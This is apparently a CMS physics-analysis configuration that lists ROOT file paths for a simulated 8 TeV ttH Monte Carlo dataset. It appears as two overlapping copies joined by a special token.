,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'
,
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'
])
secFiles.extend([])
<|reserved_special_token_1|>
import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root',
